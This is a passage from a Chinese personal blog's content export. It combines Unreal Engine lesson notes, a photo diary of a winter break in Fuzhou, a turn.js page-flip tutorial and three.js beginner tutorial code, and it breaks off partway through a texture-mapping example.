    ​从 height map - 搜索 图片 (bing.com) 整点灰度图,在 PS 中将其改成 16 位、颜色为 灰度 的 png 或 raw 格式的图片。

    灰度图

    ​UE 中导入这个灰度图,调好参数,生成地形。

    创建地形

    【基础】07-3 课:植被工具的使用

    ​使用植被工具!将想在地形中放置的对象拖入植被工具中。

    植被工具

    ​植被中有些参数值得调整:

    • Mesh 中网格体双击,添加碰撞
      • 可以手动生成简单的碰撞(立方体,胶囊体)。
      • 凸包分解,给模型增加一个凸包碰撞体,调节参数在性能与精确度之间取得平衡。

    设置参数

    • Instance Settings
      • 设置 剔除距离,当物体与摄像机的距离超过该值时,不渲染。
      • 碰撞预设

    【基础】08 课:光照渲染、自动曝光、雾

    • UE4 里有着这么几种光源:

      • 定向光源
      • 点光源
      • 聚光源
      • 矩形光源(性能开支较大,用的比较少,如显示器屏幕)
      • 天空光照
    • 这些光源的细节里有着这么个属性:

      • 静态

        静态对象不能在游戏中修改。

        • 允许烘焙的光照
        • 最快的渲染速度
      • 固定

        静止对象可在游戏中修改但无法移动,启用缓存光照法。

        • 缓存动态阴影。
      • 可移动

        可移动对象能在游戏中进行移动和修改。

        • 完全动态
        • 投射动态阴影
        • 渲染速度最慢

    静态和固定移动性的区别:

    1. 渲染速度对比:静态渲染速度最快(性能开销最小)
    2. 参数修改:静态光源构建完后修改参数,需要重新构建才会出效果,且静态不能在游戏中修改参数
    3. 阴影:静态无法对可移动的模型产生阴影

    构建光照

    ​静态光照需要构建一波。

    ​设置中有个自动曝光可以调整。

    虚幻引擎中的自动曝光是一种功能,用于自动调整场景中的曝光水平,以确保画面亮度合适且细节丰富。在虚幻引擎中,自动曝光功能可以根据场景中的光照条件动态调整相机的曝光参数,使画面看起来更加自然和平衡。

    通过自动曝光功能,虚幻引擎可以根据场景中不同区域的光照强度和对比度来动态调整曝光值,以确保整个画面的亮度范围都能得到良好的展示。这有助于避免画面出现过曝(亮部细节丢失)或欠曝(暗部细节丢失)的情况,提高视觉效果和画面质量。

    总的来说,虚幻引擎中的自动曝光功能能够帮助开发者轻松地优化场景的曝光效果,使游戏画面看起来更加生动逼真。

    自动曝光

    ​指数级高度雾让场景在远处能有朦胧的效果。

    【基础】09 课:实现光束和体积雾

    光束

    ​教你制作室内光束的效果。

    ​平行光中细节 Light Shafts 调整 光束遮挡 和 光束泛光。

    ​指数级高度雾中细节 Volumetric 打开设置 体积雾,然后调整光源 Light 下的 体积散射强度。

    【基础】10 课:系统默认天空球使用

    天空球

    Ctrl + N 新建一个 Default 场景。

    天空球

    ​操作一下这个 Sky Sphere

    • 默认 下可以让这个天空球与平行光绑定
    • 然后就是操作颜色啊巴拉巴拉……

    【基础】11 课:获得角色控制权的两种方法

    ​把场景之前的小人给我删了。

    窗口 - 世界场景设置,修改 Game Mode 为 ThirdPersonGameMode,然后在某个地方创建玩家出生点。

    ​这个 Game Mode 也可以自己设计。

    设置出生点

    【基础】12 课:打包游戏、游戏模式、默认关卡

    项目设置

    ​设置里打开 项目设置,设置好 Default Modes (默认游戏模式)和 Default Maps (默认地图(关卡))。

    项目设置

    ​电脑应装有 Visual Studio 的相关库才可以打包项目!

    ]]>
    @@ -3140,7 +3140,7 @@ /posts/Diary-%E5%AF%92%E5%81%87%EF%BC%88%E7%A6%8F%E5%B7%9E%E7%AF%87%EF%BC%89/
    + .article-container {overflow-x: unset;}

    前言

    • 这篇博客是记录 1.21 - 2.21 在福州躺平的生活🫣!
    • 整了一个很牛逼的东东——turn.js🤤!

    正文

    寒假开始锣😍!

    ​ 寒假头几天福州疯狂降温😶‍🌫️!

    日出金山

    ​ 偷一张小小怪在师大拍的日出金山,福州难得下了雪!虽然市区 p 也没有😇。

    1.25 乌山

    寻梦闽都

    ​ 花花绿绿的寻梦闽都,把通向黎明湖的隧道霸占了😠!

    1.26 温泉公园

    晋安河

    ​ 家门口通了很方便的 4 号线😍!这样可以每天坐地铁去环境最好的省图了!

    ​ 印象中很久没有去省图旁边的温泉公园了。

    1.30 晋安湖

    晋安湖

    ​ 晋安湖公园几乎已经修缮完成。

    ​ 福州的晴天,天空真的很蓝😍。

    晋安之眼

    ​ 看着很漂亮,却不能坐的晋安之眼😅。

    2.1 福建师范大学

    师大美院旧址

    ​ 父母曾经读书的地方🤔,漂亮的小洋楼。

    雕塑

    ​ 教学楼前的雕塑。

    苏式建筑

    ​ bb 说是苏式建筑。

    2.3 三坊七巷

    南后街

    ​ 之前的暑假都懒得去的地方,这个寒假不知道去了多少次🤪,每天都人气火爆。

    2.6 烟台山

    仓山影剧院

    ​ 偷跑去烟台山公园玩。

    石厝教堂

    ​ 网红地标——石厝教堂!不过我觉得这个教堂并不是很好看,矮矮扁扁的🤔。

    福州时代中学

    ​ 时代中学最后一届学生的最后一个学期就要到了,这会不会是我最后一次见到这个招牌呢?

    2.7 南公园

    南公园
    南公园 南公园 南公园

    ​ 打着去大利嘉城整散热硅胶的幌子去南公园玩🫢。

    除夕-春节 青年广场

    青年广场

    ​ 中洲岛又要放烟花了!今年索性连春晚都没看了。

    ​ 青年广场布满了围挡差评☹️!估计是政府怕发生踩踏事故,结果造成了很大的不便。

    无人机

    ​ 风里雨里终于等到了零点!无人机启动!

    福

    ​ 2024——福州年,最有福。

    🍺

    ​ 干杯!

    ❤

    ​ 我爱虎纠!

    🐉

    ​ 龙年大吉!

    还挺厉害的

    ​ 去年福州拿了一个看上去很牛逼其实没啥卵用的奖项——全球可持续发展城市🥱。

    大疯狂

    ​ 最后一阵乱喷。

    ​ 为了保证网页浏览速度,只能压缩出这么一小段烟花。

    2.11 旗山湖

    旗山湖

    ​ 偷跑去晋安湖的好朋友——旗山湖!

    2.12 梁厝

    ​ 看小红书说梁厝是个不错的地方,还可以地铁直达,去闯闯😍。

    艺术中心

    ​ 梁厝旁边有点掉色的艺术中心。

    梁厝

    ​ 在外面呆久了,才能注意到这种建筑真的很有福州特色。

    🐘

    ​ 梁厝里最大的厝!前面有个大围挡差评!

    可爱小蜜蜂

    ​ 南方春来早。采蜜的蜜蜂。

    游神 游神 游神

    ​ 今年福州拿出了游神这种我这个假福州人从来没有听说过的东西🤧,看得出福州也在很努力地宣传旅游资源。

    古与今

    ​ 古今同框,这个“古”挺新,这个“今”反倒有点旧🥸。

    这个地方真是太好玩了!

    ​ 返程途中又去了著名景点三坊七巷😇,人居多。

    ​ 这段时间可以看到很多外地的车牌,浙 B 的尤其多。

    2.14 金鸡山公园

    金鸡山公园

    ​ 从图书馆出来走彩虹桥结果给我直接送山顶去了🤧。

    2.15 福州市博物馆

    律师函⚠

    ​ 理着中分头的市博。

    古吴神韵

    ​ 吴越地区是中华文明的重要起源地之一,是中国东部长江下游的古代文明中心。吴越文化与长江中游的楚文化和长江上游的巴蜀文化并称为长江流域古代三大文明。吴是周人和江南土著民族结合而形成的诸侯国,商晚周初在太伯、仲雍创建勾吴时一方面“端委,以治周礼”;另一方面又随乡入俗,“断发文身”。所以吴国文化是由华夏文化和土著“荆蛮人”文化相融合形成的区域性文化,始终保持着鲜明的地方特征。
    本展览撷取镇江博物馆藏吴文化青铜精品 56 件(套),从一个侧面揭示吴文化的区域特征,相信会给大家带来别样的感受。

    市博 市博 市博

    ​ 先是跟福州毫不搭嘎的展览——镇江青铜文物展!

    镂云裁月 妙笔神针——吉林地区满族绣品展

    ​ 满族刺绣作为满族民族文化的重要载体,以针代笔,以线代墨,是满族先民审美与智慧的结晶,也是满汉文化相互交融的历史见证。
    ​ 吉林是满族聚居地之一,清代曾在这里设立打牲乌拉总管衙门,负责为皇室采捕贡品。吉林满族绣品,具有强烈的民族及地域特色,造型夸张粗犷,色彩凝重艳丽,冷暖对比强烈,构图饱满对称,绣工精美绝伦。其作品主要有枕头顶、荷包、幔帘、幔帐、围裙等。题材内容,既有生产生活因素,又有文化传承关系,尤其是萨满文化主题。
    ​ 本次展出的作品,多来自打牲乌拉总管衙门辖地的伊通和九台地区,时代跨度从清代到民国,以代表满族民间刺绣精华的“枕头顶绣”和“幔帐套绣”为主,堪称传统艺术瑰宝。

    市博 市博 市博

    ​ 然后是跟福州毫不搭嘎的展览——吉林满族刺绣展!

    市博

    ​ 福州古地图,根本认不出来😅。

    市博 市博 市博

    ​ 然后是跟福州搭嘎的展览——“碗礁一号”沉船出水瓷器展!只是江西的瓷器到福州出海的时候沉船了,就算是福州的了🤔。

    市博 市博 市博

    ​ 然后是跟福州非常搭嘎的展览——闽都华章!陶陶罐罐,佛像泥人。

    青铜器

    ​ 商代的福州居然能出现这么牛逼的青铜器?!

    2.16 台江

    文化宫

    ​ 寒假就快结束了!想走之前再约个球,去文化宫踩点。好消息是这段时间文化宫球场免费,坏消息是因为球场免费导致占不到场地😇。

    上下杭

    ​ 人挤人的上下杭,拥挤状况就比三坊七巷好一丢丢。

    老房子

    ​ 还有一点租界的痕迹。

    long 华富贵

    ​ 福建特产——龙华富贵!

    WAIYA

    ​ 只要几个福字就能成为非常网红的小街。

    ❤

    ​ 打卡网红大字。

    厝与教堂

    ​ 中外同框。

    茉莉大街

    ​ 没有一朵茉莉花的大街。

    万寿桥

    ​ 框框里的解放大桥。

    口号

    ​ 普通话不标准,让故乡更亲近😇!

    2.17 康桥里

    ​ 超人大炮从湖南回来了,或许是最后一次在福州见到他?这也将是我离开福州前的最后一个周末了,跟大炮哥和保罗约个球,那早上就跟保罗看了个《飞驰人生 2》,我觉得还不错,保罗说一般般🧐。

    康桥里

    ​ 看电影前在电影院外的投篮机打发时间,被保罗吊打😵。

    炒菜

    ​ 体验一下保罗的工作餐。

    花灯

    ​ 打完球吃完饭随便走了走金鸡山公园。

    瀑布

    ​ 金鸡山公园的瀑布好久没见到了,保罗说一直都有瀑布的🫣。

    2.18 省图

    省图

    ​ 要走之前再记录下省图吧!

    中国梦

    ​ 面积比市图小很多,内部设施却比市图好很多的省图。

    2.19 西湖公园

    福泽绵长

    ​ 本来想去省博的,结果一看手机发现是星期一🙄,寄!

    五福临门

    ​ 西湖公园怪石前的可爱小龙龙。

    西湖

    ​ 拍的时候觉得还蛮漂亮的,写的时候已经去了杭州西湖就觉得不漂亮了🤧。

    2.20 保定

    福建保定

    ​ 临走前得去一下著名景点——保定巷!

    2.21 END

    再见

    ​ 最早也得 7.14 以后再见了!



    ]]>
    @@ -3165,7 +3165,7 @@ /posts/Web-turn.js/
    + #magazine{margin: 1em auto;}#magazine div{background-size:cover;}#magazine .turn-page{background-color:#fff;background-size:100% 100%;}

    资源

    快速开始

    Turn.js is a JavaScript library that will make your content look like a real book or magazine using all the advantages of HTML5. The web is getting beautiful with new user interfaces based in HTML5; turn.js is the best fit for a magazine, book or catalog based in HTML5.

    ​ 先实现一个简单的:

    ​ 从 Turn.js: The page flip effect in HTML5 (turnjs.com) 里下载源码和示例。

    ​ 官方示例似乎考虑到了不兼容 HTML5 的情况,我们就简化点,直接使用 turn.min.js(还应导入 jQuery,不过这个博客主题自带,就不需要引入):

    <script type="text/javascript" src="/js/turn.min.js"></script>

    ​ 接下来创建一个电子书:

    #magazine{
        margin: 1em auto;
    }
    #magazine div{
        background-size: cover;
    }
    #magazine .turn-page{
        background-color: #fff;
        background-size: 100% 100%;
    }

    ​ 一个 <div></div> 代表一页。

    <div id="magazine">
        <div style="background-image:url(pages/01.jpg);"></div>
        <div style="background: #ccc;">Hello World!</div>
        <div style="background-image:url(pages/02.jpg);"></div>
        <div style="background-image:url(pages/03.jpg);"></div>
        <div style="background-image:url(pages/04.jpg);"></div>
        <div style="background-image:url(pages/05.jpg);"></div>
        <div style="background-image:url(pages/06.jpg);"></div>
        <div style="background: #ccc;">Hello World!</div>
    </div>
    • $(document).ready(function () { 设置电子书的宽高,宽度为 95%,高度随宽度而定,比例 752 / 1152 是根据电子书图片的宽高($576\times752$)计算得到。
    • $(window).ready(function () {} 设置电子书的属性:
      • display: double 双页电子书。
      • 其它默认。
    • $(window).bind('keydown', function (e) {} 设置按钮监听,按下键盘左键和右键时翻页。
    $(document).ready(function () {
        // 获取容器元素
        var container = $('#magazine');
        // 设置容器宽度
        container.css('width', '95%');
        // 计算高度
        var width = container.width(); // 获取容器的实际宽度
        var height = (752 / 1152) * width; // 根据比例计算高度
        // 设置容器高度
        container.css('height', height + 'px'); // 将高度值赋给容器的高度属性
    });

    $(window).ready(function () {
        $('#magazine').turn({
            display: 'double',
            acceleration: true,
            gradients: !$.isTouch,
            elevation: 50,
            when: {
                turned: function (e, page) {
                    /*console.log('Current view: ', $(this).turn('view'));*/
                }
            }
        });
    });

    $(window).bind('keydown', function (e) {
        if (e.keyCode == 37)
            $('#magazine').turn('previous');
        else if (e.keyCode == 39)
            $('#magazine').turn('next');
    });
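
    ​ 窗口大小变化时,上面算好的宽高不会自动更新。turn.js 提供了 size 方法,可以在 resize 时重设尺寸(一个小示意):

    $(window).on('resize', function () {
        var width = $('#magazine').width(); // 容器宽度是 95%,会随窗口自适应
        var height = (752 / 1152) * width;  // 按同样的比例重新计算高度
        $('#magazine').turn('size', width, height);
    });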

    ​ 最终效果:

    Hello World!
    Hello World!
    ]]>
    @@ -3194,7 +3194,7 @@ /posts/Web-ThreeJS/ - 资源

    0

    0.4 GitHub 上的 three.js - 魔法出现的地方

    mrdoob/three.js: JavaScript 3D Library. (github.com) 中:

    • build/three.module.js 是运行所需的文件。
    • examples/ 代码示例。
    • src/ 源代码。

    0.5 如何在你的项目中引入 three.js

    在项目文件夹中,初始化 npm:

    npm init

    安装 three.js:

    npm install --save three

    导入:

    import {XXX, XXX, XXX} from 'three/build/three.module.js';

    直接从 mrdoob/three.js: JavaScript 3D Library. (github.com) 里下载 build/three.module.js

    要引入的话,直接:

    <script type="module" src="three.module.js"></script>

    1-入门:真正的乐趣从这里开始!

    1.1 Three.js 应用的结构

    <!DOCTYPE html>
    <html lang="en">

    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
    </head>

    <link href="./styles/main.css" rel="stylesheet" type="text/css">

    <body>
        <div id="scene-container">
            <!-- Our <canvas> will be inserted here -->
        </div>
    </body>

    <script type="module" src="./src/main.js"></script>

    </html>
    body {
        /* remove margins and scroll bars */
        margin: 0;
        overflow: hidden;

        /* style text */
        text-align: center;
        font-size: 12px;
        font-family: Sans-Serif;

        /* color text */
        color: #444;
    }

    h1 {
        /* position the heading */
        position: absolute;
        width: 100%;

        /* make sure that the heading is drawn on top */
        z-index: 1;
    }

    #scene-container {
        /* tell our scene container to take up the full page */
        position: absolute;
        width: 100%;
        height: 100%;

        /* Set the container's background color to the same as the scene's background to prevent flashing on load */
        background-color: skyblue;
    }

Importing via npm:

import {
  Camera,
  Group,
  Scene,
} from 'three';

    import { OrbitControls } from 'three/examples/jsm/controls/OrbitControls.js';
    import { GLTFLoader } from 'three/examples/jsm/loaders/GLTFLoader.js';

Importing via CDN:

    import { Camera, Group, Scene } from "https://cdn.skypack.dev/three@0.132.2";
    import { OrbitControls } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/controls/OrbitControls.js?module";
    import { GLTFLoader } from "https://cdn.skypack.dev/three@0.132.2/examples/jsm/loaders/GLTFLoader.js?module";

Or download build/three.module.js directly from mrdoob/three.js: JavaScript 3D Library. (github.com), put it under vendor/three/build/, and import it locally:

// import the Three.js modules
import {
  XXX,
  XXX
} from '../vendor/three/build/three.module.js';

...organize freely...

This is where JS files written by other people go.

Anything you use that isn't HTML, CSS, or JavaScript lives here: textures, 3D models, fonts, sounds, and so on.

1.2 Your First three.js Scene: Hello, Cube!

Writing main.js:

• Import the modules:
  // import the Three.js modules
  import {
    Scene,
    PerspectiveCamera,
    WebGLRenderer,
    BoxGeometry,
    MeshBasicMaterial,
    Mesh,
    Color
  } from '../vendor/three/build/three.module.js';
• Grab the container that will hold the canvas:
  const container = document.querySelector('#scene-container');
• Create a new scene:
  const scene = new Scene();
• Set the background to sky blue:
  scene.background = new Color('skyblue');
• Define a perspective camera:
  • fov: the field of view.
  • aspect: the camera's aspect ratio (the container's width divided by its height).
  • near: the near clipping plane. Only objects beyond this distance are captured by the camera; anything closer is ignored. It must be positive, and should be as small as practical so nearby detail isn't clipped, but making it too small can cause depth-buffer problems.
  • far: the far clipping plane. Anything beyond this distance is not captured. It determines how far the camera can see; making it too large can hurt rendering performance and depth-buffer precision.
• Once defined, place the camera at $(0, 0, 10)$ in the scene.
    const fov = 35; // AKA Field of View
    const aspect = container.clientWidth / container.clientHeight;
    const near = 0.1; // the near clipping plane
    const far = 100; // the far clipping plane

    const camera = new PerspectiveCamera(fov, aspect, near, far);
    camera.position.set(0, 0, 10);
• Define a box mesh with dimensions $(2, 2, 2)$:
  // note that this uses BoxGeometry
  const geometry = new BoxGeometry(2, 2, 2);
• Define a material:
  const material = new MeshBasicMaterial({ color: 0x44aa88 });
• A Mesh object, made from the geometry and the material:
  const cube = new Mesh(geometry, material);
• Add the cube to the scene:
  scene.add(cube);
• Finally, the rendering steps:

  • const renderer = new WebGLRenderer(); creates a new WebGLRenderer instance.

    WebGLRenderer is the three.js renderer that draws 3D graphics into a web page using the WebGL API. By default it creates a <canvas> element on which the rendered graphics are displayed.

    • renderer.setSize(container.clientWidth, container.clientHeight); uses the setSize method to match the renderer's size to the container (typically some HTML element).

      container.clientWidth and container.clientHeight give the container's width and height, so the rendered scene fills the container without being stretched or squashed.

    • renderer.setPixelRatio(window.devicePixelRatio);

      Sets the renderer's pixel ratio from window.devicePixelRatio to adapt to the screen's resolution, so the output stays sharp on high-pixel-density displays (such as Retina screens).

    • container.appendChild(renderer.domElement);

      The <canvas> the renderer created is available as renderer.domElement. This line appends that <canvas> to the container we selected earlier, so the rendered scene shows up inside it on the page.

    • renderer.render(scene, camera);

      Finally, render the scene with the render method. It takes two arguments: the scene and the camera. The scene contains all the 3D objects to draw, and the camera defines the viewpoint. When called, three.js computes and draws the final image onto the <canvas>.

    const renderer = new WebGLRenderer();
    renderer.setSize(container.clientWidth, container.clientHeight);
    renderer.setPixelRatio(window.devicePixelRatio);

    container.appendChild(renderer.domElement);

    renderer.render(scene, camera);

Demo

Here is, I think, what this code would look like implemented in Blender:

import bpy
import numpy as np

# delete every object in the default scene
bpy.ops.object.select_all(action='SELECT')
bpy.ops.object.delete(use_global=False)

# use the Cycles render engine (Eevee would also work)
bpy.context.scene.render.engine = 'CYCLES'

# get the current world
world = bpy.data.worlds['World']
# make sure nodes are enabled
world.use_nodes = True
# get the node tree's nodes
nodes = world.node_tree.nodes
# remove all existing nodes
nodes.clear()
# create a new background node
bg_node = nodes.new(type='ShaderNodeBackground')
# set the background color to sky blue
bg_node.inputs[0].default_value = (135/255, 206/255, 235/255, 1)  # RGBA
# create a world output node
world_output_node = nodes.new(type='ShaderNodeOutputWorld')
# link the background node to the world output node
links = world.node_tree.links
link = links.new(bg_node.outputs[0], world_output_node.inputs[0])

# create a cube
bpy.ops.mesh.primitive_cube_add(size=2, location=(0, 0, 0))
# grab the cube object we just added
cube = bpy.context.object
# create a new material
mat = bpy.data.materials.new(name="CubeMaterial")
# set the material's base color
mat.diffuse_color = (68/255, 170/255, 136/255, 1)  # RGB + alpha
# assign the material to the cube
if not cube.data.materials:
    cube.data.materials.append(mat)
else:
    cube.data.materials[0] = mat

# add a camera and keep a reference to it
bpy.ops.object.camera_add(location=(0, 0, 10))
camera = bpy.context.object  # the camera object we just added

# set the camera's fov, near and far parameters
camera.data.angle = 35 * (np.pi / 180)  # Blender uses radians, three.js uses degrees
camera.data.clip_start = 0.1
camera.data.clip_end = 100

# the camera position was already set when the camera was added
# camera.location = (0, 0, 10)

# set the render resolution
bpy.context.scene.render.resolution_x = 1848
bpy.context.scene.render.resolution_y = 1206
bpy.context.scene.render.resolution_percentage = 100

    Blender

1.3 Introducing the World App

This chapter is mainly about splitting the previous code into modules.

Modularization

Get the container and import World.js:

import { World } from './World/World.js';

function main() {
  // Get a reference to the container element
  const container = document.querySelector('#scene-container');

  // 1. Create an instance of the World app
  const world = new World(container);

  // 2. Render the scene
  world.render();
}

// call main to start the app
main();

Move everything from before into it: defining the camera, creating the cube, setting up the scene, the renderer, the window resizing, and so on.

import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createScene } from './components/scene.js';

import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/resizer.js';

// These variables are module-scoped: we cannot access them
// from outside the module
let camera;
let renderer;
let scene;

class World {
  constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();

    scene.add(cube);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }
}

export { World };

The renderer system:

import { WebGLRenderer } from 'three';

function createRenderer() {
  const renderer = new WebGLRenderer();

  return renderer;
}

export { createRenderer };

The scene component:

import { Color, Scene } from 'three';

function createScene() {
  const scene = new Scene();

  scene.background = new Color('skyblue');

  return scene;
}

export { createScene };

The camera component:

import { PerspectiveCamera } from 'three';

function createCamera() {
  const camera = new PerspectiveCamera(
    35, // fov = Field Of View
    1, // aspect ratio (dummy value)
    0.1, // near clipping plane
    100, // far clipping plane
  );

  // move the camera back so we can view the scene
  camera.position.set(0, 0, 10);

  return camera;
}

export { createCamera };

The cube component, which creates the geometry, the material, and the mesh.

import { BoxBufferGeometry, Mesh, MeshBasicMaterial } from 'three';

function createCube() {
  // create a geometry
  const geometry = new BoxBufferGeometry(2, 2, 2);

  // create a default (white) Basic material
  const material = new MeshBasicMaterial();

  // create a Mesh containing the geometry and material
  const cube = new Mesh(geometry, material);

  return cube;
}

export { createCube };

Make the scene take up the full window:

class Resizer {
  constructor(container, camera, renderer) {
    // Set the camera's aspect ratio
    camera.aspect = container.clientWidth / container.clientHeight;

    // update the camera's frustum
    camera.updateProjectionMatrix();

    // update the size of the renderer AND the canvas
    renderer.setSize(container.clientWidth, container.clientHeight);

    // set the pixel ratio (for mobile devices)
    renderer.setPixelRatio(window.devicePixelRatio);
  }
}

1.4 Physically Based Rendering and Lighting

three.js also uses physically based rendering (PBR).

Building on the modularized program, keep modifying:

Tell the renderer to enable physically based lighting.

import { WebGLRenderer } from 'three';

function createRenderer() {
  const renderer = new WebGLRenderer({ antialias: true });

  renderer.physicallyCorrectLights = true;

  return renderer;
}

export { createRenderer };

Define a light:

• intensity set to $8$
• positioned at $(10, 10, 10)$, shining towards the origin
import { DirectionalLight } from 'three';

function createLights() {
  // Create a directional light
  const light = new DirectionalLight('white', 8);

  // move the light right, up, and towards us
  light.position.set(10, 10, 10);

  return light;
}

export { createLights };

Add the light to the scene in scene.add()!

import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createScene } from './components/scene.js';
import { createLights } from './components/lights.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/resizer.js';

// These variables are module-scoped: we cannot access them
// from outside the module
let camera;
let renderer;
let scene;

class World {
  constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }
}

export { World };

Demo

1.5 Transformations, Coordinate Systems, and the Scene Graph

Hmm, pretty much the same as in Unity.

In cube.js you can modify the cube's position, rotation, and scale:

import {
  BoxBufferGeometry,
  MathUtils,
  Mesh,
  MeshStandardMaterial,
} from 'three';

function createCube() {
  const geometry = new BoxBufferGeometry(2, 2, 2);

  const material = new MeshStandardMaterial({ color: 'purple' });

  const cube = new Mesh(geometry, material);

  cube.position.x = -0.5;
  cube.position.y = -0.1;
  cube.position.z = 1;

  // equivalent to:
  // cube.position.set(-0.5, -0.1, 1);

  cube.scale.x = 1.25;
  cube.scale.y = 0.25;
  cube.scale.z = 0.5;

  // equivalent to:
  // cube.scale.set(1.25, 0.25, 0.5);

  // to rotate using degrees, they must
  // first be converted to radians
  cube.rotation.x = MathUtils.degToRad(-60);
  cube.rotation.y = MathUtils.degToRad(-45);
  cube.rotation.z = MathUtils.degToRad(60);

  return cube;
}

export { createCube };

You can also place objects inside other objects, as their children:

Nesting dolls!

    scene.add(mesh);

    // the children array contains the mesh we added
    scene.children; // -> [mesh]

    // now, add a light:
    scene.add(light);

    // the children array now contains both the mesh and the light
    scene.children; // -> [mesh, light];

    // now you can access the mesh and light using array indices
    scene.children[0]; // -> mesh
    scene.children[1]; // -> light

1.6 Making Our Scene Responsive (and Dealing with Jaggies)

Anti-aliasing

Enable anti-aliasing in renderer.js:

    const renderer = new WebGLRenderer({ antialias: true });

Handling browser window resizes seamlessly

Modify resizer.js:

• Wrap setSize in a function, and call setSize() again whenever the user resizes the window (which fires window.addEventListener('resize', () => {});).
• Define an onResize() hook so callers can override it.
const setSize = (container, camera, renderer) => {
  camera.aspect = container.clientWidth / container.clientHeight;
  camera.updateProjectionMatrix();

  renderer.setSize(container.clientWidth, container.clientHeight);
  renderer.setPixelRatio(window.devicePixelRatio);
};

class Resizer {
  constructor(container, camera, renderer) {
    // set initial size on load
    setSize(container, camera, renderer);

    window.addEventListener('resize', () => {
      // set the size again if a resize occurs
      setSize(container, camera, renderer);
      // perform any custom actions
      this.onResize();
    });
  }

  onResize() { }
}

export { Resizer };

Modify World.js:

• Override onResize() so the frame is re-rendered whenever the window changes:
import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createScene } from './components/scene.js';
import { createLights } from './components/lights.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/resizer.js';

let camera;
let renderer;
let scene;

class World {
  constructor(container) {
    camera = createCamera();
    scene = createScene();
    renderer = createRenderer();
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
    resizer.onResize = () => {
      this.render();
    };
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }
}

export { World };

Demo

1.7 The Animation Loop

Create a Loop.js for the loop:

• constructor():
  • camera: the camera.
  • scene: the scene.
  • renderer: the renderer.
  • updatables: the list of objects to update inside the loop.
• start() starts the loop via this.renderer.setAnimationLoop(() => {});.
  • this.tick(); advances the clock.
  • this.renderer.render(this.scene, this.camera); renders a frame on every iteration.
• stop() clears the loop: this.renderer.setAnimationLoop(null);.
• tick():
  • const delta = clock.getDelta(); measures how long the last frame took to render (in seconds).
  • It then calls tick() on every object in this.updatables (much like Update() in Unity).
import { Clock } from "three";

const clock = new Clock();

class Loop {
  constructor(camera, scene, renderer) {
    this.camera = camera;
    this.scene = scene;
    this.renderer = renderer;
    this.updatables = [];
  }

  start() {
    this.renderer.setAnimationLoop(() => {
      // tell every animated object to tick forward one frame
      this.tick();

      // render a frame
      this.renderer.render(this.scene, this.camera);
    });
  }

  stop() {
    this.renderer.setAnimationLoop(null);
  }

  tick() {
    // only call the getDelta function once per frame!
    const delta = clock.getDelta();

    // console.log(
    //   `The last frame rendered in ${delta * 1000} milliseconds`,
    // );

    for (const object of this.updatables) {
      object.tick(delta);
    }
  }
}

export { Loop };
• import { Loop } from './systems/Loop.js'; imports the new module.
• let loop; and loop = new Loop(camera, scene, renderer); create the loop as a module-scoped variable, like camera, renderer, and scene, because we don't want it accessible from outside the World class.
• loop.updatables.push(cube); pushes cube into loop.updatables so the loop updates it.
• start() and stop() simply delegate to the loop's start() and stop().
import { createCamera } from './components/camera.js';
import { createCube } from './components/cube.js';
import { createLights } from './components/lights.js';
import { createScene } from './components/scene.js';
import { createRenderer } from './systems/renderer.js';
import { Resizer } from './systems/Resizer.js';
import { Loop } from './systems/Loop.js';

let camera;
let renderer;
let scene;
let loop;

class World {
  constructor(container) {
    camera = createCamera();
    renderer = createRenderer();
    scene = createScene();
    loop = new Loop(camera, scene, renderer);
    container.append(renderer.domElement);

    const cube = createCube();
    const light = createLights();

    loop.updatables.push(cube);

    scene.add(cube, light);

    const resizer = new Resizer(container, camera, renderer);
  }

  render() {
    // draw a single frame
    renderer.render(scene, camera);
  }

  start() {
    loop.start();
  }

  stop() {
    loop.stop();
  }
}

export { World };

The entry point now calls world.start();:

import { World } from './World/World.js';

function main() {
  // Get a reference to the container element
  const container = document.querySelector('#scene-container');

  // create a new world
  const world = new World(container);

  // draw the scene
  world.start();
}

main();

Define cube.tick: rotate by $30^\circ$ per second.

import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils } from 'three';

function createCube() {
  // create a geometry
  const geometry = new BoxGeometry(2, 2, 2);

  // create a purple Standard material
  const material = new MeshStandardMaterial({ color: "purple" });

  // create a Mesh containing the geometry and material
  const cube = new Mesh(geometry, material);

  cube.rotation.set(-0.5, -0.1, 0.8);

  const radiansPerSecond = MathUtils.degToRad(30);
  // this method will be called once per frame
  cube.tick = (delta) => {
    // increase the cube's rotation each frame
    cube.rotation.z += radiansPerSecond * delta;
    cube.rotation.x += radiansPerSecond * delta;
    cube.rotation.y += radiansPerSecond * delta;
  };

  return cube;
}

export { createCube };

Demo

1.8 Texture Mapping

Give the cube a texture:

Textured cube

Modify components/cube.js:

• Define createMaterial(), moving the material-creation code into its own function.
  • const textureLoader = new TextureLoader(); creates a texture loader.
  • const texture = textureLoader.load('./assets/textures/uv-test-bw.png',); loads the texture, converting it into a form the material class can read.
  • const material = new MeshStandardMaterial({map: texture,}); defines the material.
import { BoxGeometry, Mesh, MeshStandardMaterial, MathUtils, TextureLoader } from 'three';

function createMaterial() {
  // create a texture loader.
  const textureLoader = new TextureLoader();
  // load a texture
  const texture = textureLoader.load(
    './assets/textures/uv-test-bw.png',
  );
  // create a "standard" material using
  // the texture we just loaded as a color map
  const material = new MeshStandardMaterial({
    map: texture,
  });

  return material;
}

function createCube() {
  // create a geometry
  const geometry = new BoxGeometry(2, 2, 2);

  // create a textured Standard material
